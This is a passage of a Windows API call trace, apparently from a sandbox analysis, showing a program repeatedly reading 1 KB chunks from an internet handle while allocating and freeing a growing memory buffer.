dwFreeType=0x4000) returned 1 [0122.511] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.512] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.513] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.517] VirtualFree (lpAddress=0x4b20000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0122.519] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.519] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0122.521] VirtualFree (lpAddress=0x4b40000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.522] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.523] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.525] VirtualFree (lpAddress=0x4b64000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.528] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.529] VirtualAlloc (lpAddress=0x4b44000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b44000 [0122.529] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.530] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.532] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.536] VirtualFree (lpAddress=0x4b20000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.539] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.539] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0122.540] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.543] VirtualFree (lpAddress=0x4b44000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.545] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.545] VirtualFree (lpAddress=0x4b68000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.546] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.548] VirtualFree (lpAddress=0x4b70000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.550] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.551] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.554] VirtualFree (lpAddress=0x4b20000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.557] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0122.558] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.562] VirtualFree (lpAddress=0x4b44000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.563] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.563] VirtualFree (lpAddress=0x4b68000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.564] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.567] VirtualFree (lpAddress=0x4b70000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.569] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.569] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.570] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.573] VirtualFree (lpAddress=0x4b20000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.575] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0122.576] VirtualFree (lpAddress=0x4b6c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.580] VirtualFree (lpAddress=0x4b44000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.589] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.590] VirtualFree (lpAddress=0x4b68000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.590] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.594] VirtualFree (lpAddress=0x4b70000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.596] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.597] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.600] VirtualFree (lpAddress=0x4b20000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.603] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.603] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0122.606] VirtualFree (lpAddress=0x4b44000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.608] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.612] VirtualFree (lpAddress=0x4b6c000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.614] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.615] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.616] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.620] VirtualFree (lpAddress=0x4b20000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0122.622] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.623] VirtualAlloc (lpAddress=0x4b70000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b70000 [0122.627] VirtualFree (lpAddress=0x4b44000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.628] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.628] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.631] VirtualFree (lpAddress=0x4b6c000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.635] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.635] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.635] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.637] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.640] VirtualFree (lpAddress=0x4b20000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.642] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0122.642] VirtualFree (lpAddress=0x4b74000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.646] VirtualFree (lpAddress=0x4b48000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.649] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.649] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.650] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.654] VirtualFree (lpAddress=0x4b78000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.657] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.658] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.658] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.665] VirtualFree (lpAddress=0x4b20000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.669] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0122.671] VirtualFree (lpAddress=0x4b74000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.676] VirtualFree (lpAddress=0x4b48000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.677] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.677] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.677] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.681] VirtualFree (lpAddress=0x4b78000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.684] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.685] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.685] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.693] VirtualFree (lpAddress=0x4b20000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.696] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.696] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0122.697] VirtualFree (lpAddress=0x4b74000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.702] VirtualFree (lpAddress=0x4b48000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.704] VirtualFree (lpAddress=0x4b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.704] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.709] VirtualFree (lpAddress=0x4b78000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.712] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.712] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.712] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.716] VirtualFree (lpAddress=0x4b20000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.719] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0122.723] VirtualFree (lpAddress=0x4b48000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.725] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.729] VirtualFree (lpAddress=0x4b74000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.734] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.736] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.740] VirtualFree (lpAddress=0x4b20000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0122.742] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.743] VirtualAlloc (lpAddress=0x4b78000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b78000 [0122.747] VirtualFree (lpAddress=0x4b48000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.748] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.748] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.751] VirtualFree (lpAddress=0x4b74000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.758] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.758] VirtualAlloc (lpAddress=0x4b4c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b4c000 [0122.758] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.759] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.761] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.765] VirtualFree (lpAddress=0x4b20000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.767] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.768] VirtualAlloc (lpAddress=0x4b80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b80000 [0122.769] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.775] VirtualFree (lpAddress=0x4b4c000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.777] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.778] VirtualFree (lpAddress=0x4b78000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.778] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.782] VirtualFree (lpAddress=0x4b80000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.785] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.786] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.786] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.791] VirtualFree (lpAddress=0x4b20000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.794] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.794] VirtualAlloc (lpAddress=0x4b80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b80000 [0122.795] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.801] VirtualFree (lpAddress=0x4b4c000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.802] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.803] VirtualFree (lpAddress=0x4b78000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.803] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.807] VirtualFree (lpAddress=0x4b80000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.809] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.810] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.810] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.814] VirtualFree (lpAddress=0x4b20000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.817] VirtualAlloc (lpAddress=0x4b80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b80000 [0122.818] VirtualFree (lpAddress=0x4b7c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.824] VirtualFree (lpAddress=0x4b4c000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.827] VirtualFree (lpAddress=0x4b78000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.827] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.833] VirtualFree (lpAddress=0x4b80000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.836] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.837] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.841] VirtualFree (lpAddress=0x4b20000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.844] VirtualAlloc (lpAddress=0x4b80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b80000 [0122.848] VirtualFree (lpAddress=0x4b4c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.850] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.853] VirtualFree (lpAddress=0x4b7c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.856] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.856] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.858] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.861] VirtualFree (lpAddress=0x4b20000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0122.863] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.863] VirtualAlloc (lpAddress=0x4b80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b80000 [0122.866] VirtualFree (lpAddress=0x4b4c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.868] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.871] VirtualFree (lpAddress=0x4b7c000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.874] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.875] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, 